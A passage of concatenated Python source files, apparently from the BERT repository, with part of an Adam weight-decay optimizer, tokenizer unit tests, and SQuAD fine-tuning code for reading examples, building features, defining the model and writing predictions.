global_steps_float / warmup_steps_float warmup_learning_rate = init_lr * warmup_percent_done is_warmup = tf.cast(global_steps_int < warmup_steps_int, tf.float32) learning_rate = ( (1.0 - is_warmup) * learning_rate + is_warmup * warmup_learning_rate) # It is recommended that you use this optimizer for fine tuning, since this # is how the model was trained (note that the Adam m/v variables are NOT # loaded from init_checkpoint.) optimizer = AdamWeightDecayOptimizer( learning_rate=learning_rate, weight_decay_rate=0.01, beta_1=0.9, beta_2=0.999, epsilon=1e-6, exclude_from_weight_decay=["LayerNorm", "layer_norm", "bias"]) if use_tpu: optimizer = tf.contrib.tpu.CrossShardOptimizer(optimizer) tvars = tf.trainable_variables() grads = tf.gradients(loss, tvars) # This is how the model was pre-trained. (grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0) train_op = optimizer.apply_gradients( zip(grads, tvars), global_step=global_step) # Normally the global step update is done inside of `apply_gradients`. # However, `AdamWeightDecayOptimizer` doesn't do this. But if you use # a different optimizer, you should probably take this line out. new_global_step = global_step + 1 train_op = tf.group(train_op, [global_step.assign(new_global_step)]) return train_op class AdamWeightDecayOptimizer(tf.train.Optimizer): """A basic Adam optimizer that includes "correct" L2 weight decay.""" def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-6, exclude_from_weight_decay=None, name="AdamWeightDecayOptimizer"): """Constructs a AdamWeightDecayOptimizer.""" super(AdamWeightDecayOptimizer, self).__init__(False, name) self.learning_rate = learning_rate self.weight_decay_rate = weight_decay_rate self.beta_1 = beta_1 self.beta_2 = beta_2 self.epsilon = epsilon self.exclude_from_weight_decay = exclude_from_weight_decay def apply_gradients(self, grads_and_vars, global_step=None, name=None): """See base class.""" assignments = [] for (grad, param) in grads_and_vars: if grad is None or param is None: continue param_name = self._get_variable_name(param.name) m = tf.get_variable( name=param_name + "/adam_m", shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer()) v = tf.get_variable( name=param_name + "/adam_v", shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer()) # Standard Adam update. next_m = ( tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)) next_v = ( tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))) update = next_m / (tf.sqrt(next_v) + self.epsilon) # Just adding the square of the weights to the loss function is *not* # the correct way of using L2 regularization/weight decay with Adam, # since that will interact with the m and v parameters in strange ways. # # Instead we want ot decay the weights in a manner that doesn't interact # with the m/v parameters. This is equivalent to adding the square # of the weights to the loss with plain (non-momentum) SGD. if self._do_use_weight_decay(param_name): update += self.weight_decay_rate * param update_with_lr = self.learning_rate * update next_param = param - update_with_lr assignments.extend( [param.assign(next_param), m.assign(next_m), v.assign(next_v)]) return tf.group(*assignments, name=name) def _do_use_weight_decay(self, param_name): """Whether to use L2 weight decay for `param_name`.""" if not self.weight_decay_rate: return False if self.exclude_from_weight_decay: for r in self.exclude_from_weight_decay: if re.search(r, param_name) is not None: return False return True def _get_variable_name(self, param_name): """Get the variable name from the tensor name.""" m = re.match("^(.*):\\d+$", param_name) if m is not None: param_name = m.group(1) return param_name File: tokenization_test.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import tempfile import tokenization import six import tensorflow as tf class TokenizationTest(tf.test.TestCase): def test_full_tokenizer(self): vocab_tokens = [ "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn", "##ing", "," ] with tempfile.NamedTemporaryFile(delete=False) as vocab_writer: if six.PY2: vocab_writer.write("".join([x + "\n" for x in vocab_tokens])) else: vocab_writer.write("".join( [x + "\n" for x in vocab_tokens]).encode("utf-8")) vocab_file = vocab_writer.name tokenizer = tokenization.FullTokenizer(vocab_file) os.unlink(vocab_file) tokens = tokenizer.tokenize(u"UNwant\u00E9d,running") self.assertAllEqual(tokens, ["un", "##want", "##ed", ",", "runn", "##ing"]) self.assertAllEqual( tokenizer.convert_tokens_to_ids(tokens), [7, 4, 5, 10, 8, 9]) def test_chinese(self): tokenizer = tokenization.BasicTokenizer() self.assertAllEqual( tokenizer.tokenize(u"ah\u535A\u63A8zz"), [u"ah", u"\u535A", u"\u63A8", u"zz"]) def test_basic_tokenizer_lower(self): tokenizer = tokenization.BasicTokenizer(do_lower_case=True) self.assertAllEqual( tokenizer.tokenize(u" \tHeLLo!how \n Are yoU? "), ["hello", "!", "how", "are", "you", "?"]) self.assertAllEqual(tokenizer.tokenize(u"H\u00E9llo"), ["hello"]) def test_basic_tokenizer_no_lower(self): tokenizer = tokenization.BasicTokenizer(do_lower_case=False) self.assertAllEqual( tokenizer.tokenize(u" \tHeLLo!how \n Are yoU? "), ["HeLLo", "!", "how", "Are", "yoU", "?"]) def test_wordpiece_tokenizer(self): vocab_tokens = [ "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn", "##ing" ] vocab = {} for (i, token) in enumerate(vocab_tokens): vocab[token] = i tokenizer = tokenization.WordpieceTokenizer(vocab=vocab) self.assertAllEqual(tokenizer.tokenize(""), []) self.assertAllEqual( tokenizer.tokenize("unwanted running"), ["un", "##want", "##ed", "runn", "##ing"]) self.assertAllEqual( tokenizer.tokenize("unwantedX running"), ["[UNK]", "runn", "##ing"]) def test_convert_tokens_to_ids(self): vocab_tokens = [ "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn", "##ing" ] vocab = {} for (i, token) in enumerate(vocab_tokens): vocab[token] = i self.assertAllEqual( tokenization.convert_tokens_to_ids( vocab, ["un", "##want", "##ed", "runn", "##ing"]), [7, 4, 5, 8, 9]) def test_is_whitespace(self): self.assertTrue(tokenization._is_whitespace(u" ")) self.assertTrue(tokenization._is_whitespace(u"\t")) self.assertTrue(tokenization._is_whitespace(u"\r")) self.assertTrue(tokenization._is_whitespace(u"\n")) self.assertTrue(tokenization._is_whitespace(u"\u00A0")) self.assertFalse(tokenization._is_whitespace(u"A")) self.assertFalse(tokenization._is_whitespace(u"-")) def test_is_control(self): self.assertTrue(tokenization._is_control(u"\u0005")) self.assertFalse(tokenization._is_control(u"A")) self.assertFalse(tokenization._is_control(u" ")) self.assertFalse(tokenization._is_control(u"\t")) self.assertFalse(tokenization._is_control(u"\r")) self.assertFalse(tokenization._is_control(u"\U0001F4A9")) def test_is_punctuation(self): self.assertTrue(tokenization._is_punctuation(u"-")) self.assertTrue(tokenization._is_punctuation(u"$")) self.assertTrue(tokenization._is_punctuation(u"`")) self.assertTrue(tokenization._is_punctuation(u".")) self.assertFalse(tokenization._is_punctuation(u"A")) self.assertFalse(tokenization._is_punctuation(u" ")) if __name__ == "__main__": tf.test.main() File: run_squad.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run BERT on SQuAD 1.1 and SQuAD 2.0.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import json import math import os import random import modeling import optimization import tokenization import six import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_string( "output_dir", None, "The output directory where the model checkpoints will be written.") ## Other parameters flags.DEFINE_string("train_file", None, "SQuAD json for training. E.g., train-v1.1.json") flags.DEFINE_string( "predict_file", None, "SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json") flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_integer( "max_seq_length", 384, "The maximum total input sequence length after WordPiece tokenization. " "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded.") flags.DEFINE_integer( "doc_stride", 128, "When splitting up a long document into chunks, how much stride to " "take between chunks.") flags.DEFINE_integer( "max_query_length", 64, "The maximum number of tokens for the question. Questions longer than " "this will be truncated to this length.") flags.DEFINE_bool("do_train", False, "Whether to run training.") flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.") flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.") flags.DEFINE_integer("predict_batch_size", 8, "Total batch size for predictions.") flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.") flags.DEFINE_float("num_train_epochs", 3.0, "Total number of training epochs to perform.") flags.DEFINE_float( "warmup_proportion", 0.1, "Proportion of training to perform linear learning rate warmup for. " "E.g., 0.1 = 10% of training.") flags.DEFINE_integer("save_checkpoints_steps", 1000, "How often to save the model checkpoint.") flags.DEFINE_integer("iterations_per_loop", 1000, "How many steps to make in each estimator call.") flags.DEFINE_integer( "n_best_size", 20, "The total number of n-best predictions to generate in the " "nbest_predictions.json output file.") flags.DEFINE_integer( "max_answer_length", 30, "The maximum length of an answer that can be generated. This is needed " "because the start and end predictions are not conditioned on one another.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") tf.flags.DEFINE_string( "tpu_name", None, "The Cloud TPU to use for training. This should be either the name " "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 " "url.") tf.flags.DEFINE_string( "tpu_zone", None, "[Optional] GCE zone where the Cloud TPU is located in. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string( "gcp_project", None, "[Optional] Project name for the Cloud TPU-enabled project. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") flags.DEFINE_bool( "verbose_logging", False, "If true, all of the warnings related to data processing will be printed. " "A number of warnings are expected for a normal SQuAD evaluation.") flags.DEFINE_bool( "version_2_with_negative", False, "If true, the SQuAD examples contain some that do not have an answer.") flags.DEFINE_float( "null_score_diff_threshold", 0.0, "If null_score - best_non_null is greater than the threshold predict null.") class SquadExample(object): """A single training/test example for simple sequence classification. For examples without an answer, the start and end position are -1. """ def __init__(self, qas_id, question_text, doc_tokens, orig_answer_text=None, start_position=None, end_position=None, is_impossible=False): self.qas_id = qas_id self.question_text = question_text self.doc_tokens = doc_tokens self.orig_answer_text = orig_answer_text self.start_position = start_position self.end_position = end_position self.is_impossible = is_impossible def __str__(self): return self.__repr__() def __repr__(self): s = "" s += "qas_id: %s" % (tokenization.printable_text(self.qas_id)) s += ", question_text: %s" % ( tokenization.printable_text(self.question_text)) s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens)) if self.start_position: s += ", start_position: %d" % (self.start_position) if self.start_position: s += ", end_position: %d" % (self.end_position) if self.start_position: s += ", is_impossible: %r" % (self.is_impossible) return s class InputFeatures(object): """A single set of features of data.""" def __init__(self, unique_id, example_index, doc_span_index, tokens, token_to_orig_map, token_is_max_context, input_ids, input_mask, segment_ids, start_position=None, end_position=None, is_impossible=None): self.unique_id = unique_id self.example_index = example_index self.doc_span_index = doc_span_index self.tokens = tokens self.token_to_orig_map = token_to_orig_map self.token_is_max_context = token_is_max_context self.input_ids = input_ids self.input_mask = input_mask self.segment_ids = segment_ids self.start_position = start_position self.end_position = end_position self.is_impossible = is_impossible def read_squad_examples(input_file, is_training): """Read a SQuAD json file into a list of SquadExample.""" with tf.gfile.Open(input_file, "r") as reader: input_data = json.load(reader)["data"] def is_whitespace(c): if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F: return True return False examples = [] for entry in input_data: for paragraph in entry["paragraphs"]: paragraph_text = paragraph["context"] doc_tokens = [] char_to_word_offset = [] prev_is_whitespace = True for c in paragraph_text: if is_whitespace(c): prev_is_whitespace = True else: if prev_is_whitespace: doc_tokens.append(c) else: doc_tokens[-1] += c prev_is_whitespace = False char_to_word_offset.append(len(doc_tokens) - 1) for qa in paragraph["qas"]: qas_id = qa["id"] question_text = qa["question"] start_position = None end_position = None orig_answer_text = None is_impossible = False if is_training: if FLAGS.version_2_with_negative: is_impossible = qa["is_impossible"] if (len(qa["answers"]) != 1) and (not is_impossible): raise ValueError( "For training, each question should have exactly 1 answer.") if not is_impossible: answer = qa["answers"][0] orig_answer_text = answer["text"] answer_offset = answer["answer_start"] answer_length = len(orig_answer_text) start_position = char_to_word_offset[answer_offset] end_position = char_to_word_offset[answer_offset + answer_length - 1] # Only add answers where the text can be exactly recovered from the # document. If this CAN'T happen it's likely due to weird Unicode # stuff so we will just skip the example. # # Note that this means for training mode, every example is NOT # guaranteed to be preserved. actual_text = " ".join( doc_tokens[start_position:(end_position + 1)]) cleaned_answer_text = " ".join( tokenization.whitespace_tokenize(orig_answer_text)) if actual_text.find(cleaned_answer_text) == -1: tf.logging.warning("Could not find answer: '%s' vs. '%s'", actual_text, cleaned_answer_text) continue else: start_position = -1 end_position = -1 orig_answer_text = "" example = SquadExample( qas_id=qas_id, question_text=question_text, doc_tokens=doc_tokens, orig_answer_text=orig_answer_text, start_position=start_position, end_position=end_position, is_impossible=is_impossible) examples.append(example) return examples def convert_examples_to_features(examples, tokenizer, max_seq_length, doc_stride, max_query_length, is_training, output_fn): """Loads a data file into a list of `InputBatch`s.""" unique_id = 1000000000 for (example_index, example) in enumerate(examples): query_tokens = tokenizer.tokenize(example.question_text) if len(query_tokens) > max_query_length: query_tokens = query_tokens[0:max_query_length] tok_to_orig_index = [] orig_to_tok_index = [] all_doc_tokens = [] for (i, token) in enumerate(example.doc_tokens): orig_to_tok_index.append(len(all_doc_tokens)) sub_tokens = tokenizer.tokenize(token) for sub_token in sub_tokens: tok_to_orig_index.append(i) all_doc_tokens.append(sub_token) tok_start_position = None tok_end_position = None if is_training and example.is_impossible: tok_start_position = -1 tok_end_position = -1 if is_training and not example.is_impossible: tok_start_position = orig_to_tok_index[example.start_position] if example.end_position < len(example.doc_tokens) - 1: tok_end_position = orig_to_tok_index[example.end_position + 1] - 1 else: tok_end_position = len(all_doc_tokens) - 1 (tok_start_position, tok_end_position) = _improve_answer_span( all_doc_tokens, tok_start_position, tok_end_position, tokenizer, example.orig_answer_text) # The -3 accounts for [CLS], [SEP] and [SEP] max_tokens_for_doc = max_seq_length - len(query_tokens) - 3 # We can have documents that are longer than the maximum sequence length. # To deal with this we do a sliding window approach, where we take chunks # of the up to our max length with a stride of `doc_stride`. _DocSpan = collections.namedtuple( # pylint: disable=invalid-name "DocSpan", ["start", "length"]) doc_spans = [] start_offset = 0 while start_offset < len(all_doc_tokens): length = len(all_doc_tokens) - start_offset if length > max_tokens_for_doc: length = max_tokens_for_doc doc_spans.append(_DocSpan(start=start_offset, length=length)) if start_offset + length == len(all_doc_tokens): break start_offset += min(length, doc_stride) for (doc_span_index, doc_span) in enumerate(doc_spans): tokens = [] token_to_orig_map = {} token_is_max_context = {} segment_ids = [] tokens.append("[CLS]") segment_ids.append(0) for token in query_tokens: tokens.append(token) segment_ids.append(0) tokens.append("[SEP]") segment_ids.append(0) for i in range(doc_span.length): split_token_index = doc_span.start + i token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index] is_max_context = _check_is_max_context(doc_spans, doc_span_index, split_token_index) token_is_max_context[len(tokens)] = is_max_context tokens.append(all_doc_tokens[split_token_index]) segment_ids.append(1) tokens.append("[SEP]") segment_ids.append(1) input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) # Zero-pad up to the sequence length. while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length start_position = None end_position = None if is_training and not example.is_impossible: # For training, if our document chunk does not contain an annotation # we throw it out, since there is nothing to predict. doc_start = doc_span.start doc_end = doc_span.start + doc_span.length - 1 out_of_span = False if not (tok_start_position >= doc_start and tok_end_position <= doc_end): out_of_span = True if out_of_span: start_position = 0 end_position = 0 else: doc_offset = len(query_tokens) + 2 start_position = tok_start_position - doc_start + doc_offset end_position = tok_end_position - doc_start + doc_offset if is_training and example.is_impossible: start_position = 0 end_position = 0 if example_index < 20: tf.logging.info("*** Example ***") tf.logging.info("unique_id: %s" % (unique_id)) tf.logging.info("example_index: %s" % (example_index)) tf.logging.info("doc_span_index: %s" % (doc_span_index)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("token_to_orig_map: %s" % " ".join( ["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)])) tf.logging.info("token_is_max_context: %s" % " ".join([ "%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context) ])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info( "input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info( "segment_ids: %s" % " ".join([str(x) for x in segment_ids])) if is_training and example.is_impossible: tf.logging.info("impossible example") if is_training and not example.is_impossible: answer_text = " ".join(tokens[start_position:(end_position + 1)]) tf.logging.info("start_position: %d" % (start_position)) tf.logging.info("end_position: %d" % (end_position)) tf.logging.info( "answer: %s" % (tokenization.printable_text(answer_text))) feature = InputFeatures( unique_id=unique_id, example_index=example_index, doc_span_index=doc_span_index, tokens=tokens, token_to_orig_map=token_to_orig_map, token_is_max_context=token_is_max_context, input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, start_position=start_position, end_position=end_position, is_impossible=example.is_impossible) # Run callback output_fn(feature) unique_id += 1 def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text): """Returns tokenized answer spans that better match the annotated answer.""" # The SQuAD annotations are character based. We first project them to # whitespace-tokenized words. But then after WordPiece tokenization, we can # often find a "better match". For example: # # Question: What year was John Smith born? # Context: The leader was John Smith (1895-1943). # Answer: 1895 # # The original whitespace-tokenized answer will be "(1895-1943).". However # after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match # the exact answer, 1895. # # However, this is not always possible. Consider the following: # # Question: What country is the top exporter of electornics? # Context: The Japanese electronics industry is the lagest in the world. # Answer: Japan # # In this case, the annotator chose "Japan" as a character sub-span of # the word "Japanese". Since our WordPiece tokenizer does not split # "Japanese", we just use "Japanese" as the annotation. This is fairly rare # in SQuAD, but does happen. tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text)) for new_start in range(input_start, input_end + 1): for new_end in range(input_end, new_start - 1, -1): text_span = " ".join(doc_tokens[new_start:(new_end + 1)]) if text_span == tok_answer_text: return (new_start, new_end) return (input_start, input_end) def _check_is_max_context(doc_spans, cur_span_index, position): """Check if this is the 'max context' doc span for the token.""" # Because of the sliding window approach taken to scoring documents, a single # token can appear in multiple documents. E.g. # Doc: the man went to the store and bought a gallon of milk # Span A: the man went to the # Span B: to the store and bought # Span C: and bought a gallon of # ... # # Now the word 'bought' will have two scores from spans B and C. We only # want to consider the score with "maximum context", which we define as # the *minimum* of its left and right context (the *sum* of left and # right context will always be the same, of course). # # In the example the maximum context for 'bought' would be span C since # it has 1 left context and 3 right context, while span B has 4 left context # and 0 right context. best_score = None best_span_index = None for (span_index, doc_span) in enumerate(doc_spans): end = doc_span.start + doc_span.length - 1 if position < doc_span.start: continue if position > end: continue num_left_context = position - doc_span.start num_right_context = end - position score = min(num_left_context, num_right_context) + 0.01 * doc_span.length if best_score is None or score > best_score: best_score = score best_span_index = span_index return cur_span_index == best_span_index def create_model(bert_config, is_training, input_ids, input_mask, segment_ids, use_one_hot_embeddings): """Creates a classification model.""" model = modeling.BertModel( config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) final_hidden = model.get_sequence_output() final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3) batch_size = final_hidden_shape[0] seq_length = final_hidden_shape[1] hidden_size = final_hidden_shape[2] output_weights = tf.get_variable( "cls/squad/output_weights", [2, hidden_size], initializer=tf.truncated_normal_initializer(stddev=0.02)) output_bias = tf.get_variable( "cls/squad/output_bias", [2], initializer=tf.zeros_initializer()) final_hidden_matrix = tf.reshape(final_hidden, [batch_size * seq_length, hidden_size]) logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) logits = tf.reshape(logits, [batch_size, seq_length, 2]) logits = tf.transpose(logits, [2, 0, 1]) unstacked_logits = tf.unstack(logits, axis=0) (start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1]) return (start_logits, end_logits) def model_fn_builder(bert_config, init_checkpoint, learning_rate, num_train_steps, num_warmup_steps, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) unique_ids = features["unique_ids"] input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = features["segment_ids"] is_training = (mode == tf.estimator.ModeKeys.TRAIN) (start_logits, end_logits) = create_model( bert_config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) tvars = tf.trainable_variables() initialized_variable_names = {} scaffold_fn = None if init_checkpoint: (assignment_map, initialized_variable_names ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: seq_length = modeling.get_shape_list(input_ids)[1] def compute_loss(logits, positions): one_hot_positions = tf.one_hot( positions, depth=seq_length, dtype=tf.float32) log_probs = tf.nn.log_softmax(logits, axis=-1) loss = -tf.reduce_mean( tf.reduce_sum(one_hot_positions * log_probs, axis=-1)) return loss start_positions = features["start_positions"] end_positions = features["end_positions"] start_loss = compute_loss(start_logits, start_positions) end_loss = compute_loss(end_logits, end_positions) total_loss = (start_loss + end_loss) / 2.0 train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op, scaffold_fn=scaffold_fn) elif mode == tf.estimator.ModeKeys.PREDICT: predictions = { "unique_ids": unique_ids, "start_logits": start_logits, "end_logits": end_logits, } output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions=predictions, scaffold_fn=scaffold_fn) else: raise ValueError( "Only TRAIN and PREDICT modes are supported: %s" % (mode)) return output_spec return model_fn def input_fn_builder(input_file, seq_length, is_training, drop_remainder): """Creates an `input_fn` closure to be passed to TPUEstimator.""" name_to_features = { "unique_ids": tf.FixedLenFeature([], tf.int64), "input_ids": tf.FixedLenFeature([seq_length], tf.int64), "input_mask": tf.FixedLenFeature([seq_length], tf.int64), "segment_ids": tf.FixedLenFeature([seq_length], tf.int64), } if is_training: name_to_features["start_positions"] = tf.FixedLenFeature([], tf.int64) name_to_features["end_positions"] = tf.FixedLenFeature([], tf.int64) def _decode_record(record, name_to_features): """Decodes a record to a TensorFlow example.""" example = tf.parse_single_example(record, name_to_features) # tf.Example only supports tf.int64, but the TPU only supports tf.int32. # So cast all int64 to int32. for name in list(example.keys()): t = example[name] if t.dtype == tf.int64: t = tf.to_int32(t) example[name] = t return example def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] # For training, we want a lot of parallel reading and shuffling. # For eval, we want no shuffling and parallel reading doesn't matter. d = tf.data.TFRecordDataset(input_file) if is_training: d = d.repeat() d = d.shuffle(buffer_size=100) d = d.apply( tf.contrib.data.map_and_batch( lambda record: _decode_record(record, name_to_features), batch_size=batch_size, drop_remainder=drop_remainder)) return d return input_fn RawResult = collections.namedtuple("RawResult", ["unique_id", "start_logits", "end_logits"]) def write_predictions(all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case, output_prediction_file, output_nbest_file, output_null_log_odds_file): """Write final predictions to the json file and log-odds of null if needed.""" tf.logging.info("Writing predictions to: %s" % (output_prediction_file)) tf.logging.info("Writing nbest to: %s" % (output_nbest_file)) example_index_to_features = collections.defaultdict(list) for feature in all_features: example_index_to_features[feature.example_index].append(feature) unique_id_to_result = {} for result in all_results: unique_id_to_result[result.unique_id] = result _PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name "PrelimPrediction", ["feature_index", "start_index", "end_index", "start_logit", "end_logit"]) all_predictions = collections.OrderedDict() all_nbest_json = collections.OrderedDict() scores_diff_json = collections.OrderedDict() for (example_index, example) in enumerate(all_examples): features = example_index_to_features[example_index] prelim_predictions = [] # keep track of the minimum score of null start+end of position 0 score_null = 1000000 # large and positive min_null_feature_index = 0 # the paragraph slice with min mull score null_start_logit = 0 # the start logit at the slice with min null score null_end_logit = 0 # the end logit at the slice with min null score for (feature_index, feature) in enumerate(features): result = unique_id_to_result[feature.unique_id] start_indexes = _get_best_indexes(result.start_logits, n_best_size) end_indexes = _get_best_indexes(result.end_logits, n_best_size) # if we could have irrelevant answers, get the min score of irrelevant if FLAGS.version_2_with_negative: feature_null_score = result.start_logits[0] + result.end_logits[0] if feature_null_score < score_null: score_null = feature_null_score min_null_feature_index = feature_index null_start_logit = result.start_logits[0] null_end_logit = result.end_logits[0] for start_index in start_indexes: for end_index in end_indexes: # We could hypothetically create invalid predictions, e.g., predict # that the start of the span is in the question. We throw out all # invalid predictions. if start_index >= len(feature.tokens): continue if end_index >= len(feature.tokens): continue if start_index not in feature.token_to_orig_map: continue if end_index not in feature.token_to_orig_map: continue if not feature.token_is_max_context.get(start_index, False): continue if end_index < start_index: continue length = end_index - start_index + 1 if length > max_answer_length: continue prelim_predictions.append( _PrelimPrediction( feature_index=feature_index, start_index=start_index, end_index=end_index, start_logit=result.start_logits[start_index], end_logit=result.end_logits[end_index])) if FLAGS.version_2_with_negative: prelim_predictions.append( _PrelimPrediction( feature_index=min_null_feature_index, start_index=0, end_index=0, start_logit=null_start_logit, end_logit=null_end_logit)) prelim_predictions = sorted( prelim_predictions, key=lambda x: (x.start_logit + x.end_logit), reverse=True) _NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name "NbestPrediction", ["text", "start_logit", "end_logit"]) seen_predictions = {} nbest = [] for pred in prelim_predictions: if len(nbest) >= n_best_size: break feature = features[pred.feature_index] if pred.start_index > 0: # this is a non-null prediction tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)] orig_doc_start = feature.token_to_orig_map[pred.start_index] orig_doc_end = feature.token_to_orig_map[pred.end_index] orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)] tok_text = " ".join(tok_tokens) # De-tokenize WordPieces that have been split off. tok_text = tok_text.replace(" ##", "") tok_text = tok_text.replace("##", "") # Clean whitespace tok_text = tok_text.strip() tok_text = " ".join(tok_text.split()) orig_text = " ".join(orig_tokens) final_text = get_final_text(tok_text, orig_text, do_lower_case) if final_text in seen_predictions: continue seen_predictions[final_text] = True else: final_text = "" seen_predictions[final_text] = True nbest.append( _NbestPrediction( text=final_text, start_logit=pred.start_logit, end_logit=pred.end_logit)) # if we didn't inlude the empty option in the n-best, inlcude it if FLAGS.version_2_with_negative: if "" not in seen_predictions: nbest.append( _NbestPrediction( text="", start_logit=null_start_logit, end_logit=null_end_logit)) # In very rare edge cases we could have no valid predictions. So we # just create a nonce prediction in this case to avoid failure. if not nbest: nbest.append( _NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)) assert len(nbest) >= 1 total_scores = [] best_non_null_entry = None for entry in nbest: total_scores.append(entry.start_logit + entry.end_logit) if not best_non_null_entry: if entry.text: best_non_null_entry = entry probs = _compute_softmax(total_scores) nbest_json = [] for (i, entry) in enumerate(nbest): output = collections.OrderedDict() output["text"] = entry.text output["probability"] = probs[i] output["start_logit"] = entry.start_logit output["end_logit"] = entry.end_logit nbest_json.append(output) assert len(nbest_json) >= 1 if not FLAGS.version_2_with_negative: all_predictions[example.qas_id] = nbest_json[0]["text"] else: # predict "" iff the null score - the score of best non-null > threshold score_diff = score_null - best_non_null_entry.start_logit - ( best_non_null_entry.end_logit) scores_diff_json[example.qas_id] = score_diff if score_diff > FLAGS.null_score_diff_threshold: all_predictions[example.qas_id] = "" else: all_predictions[example.qas_id] = best_non_null_entry.text all_nbest_json[example.qas_id] = nbest_json with tf.gfile.GFile(output_prediction_file, "w") as writer: writer.write(json.dumps(all_predictions, indent=4) + "\n") with tf.gfile.GFile(output_nbest_file, "w") as writer: 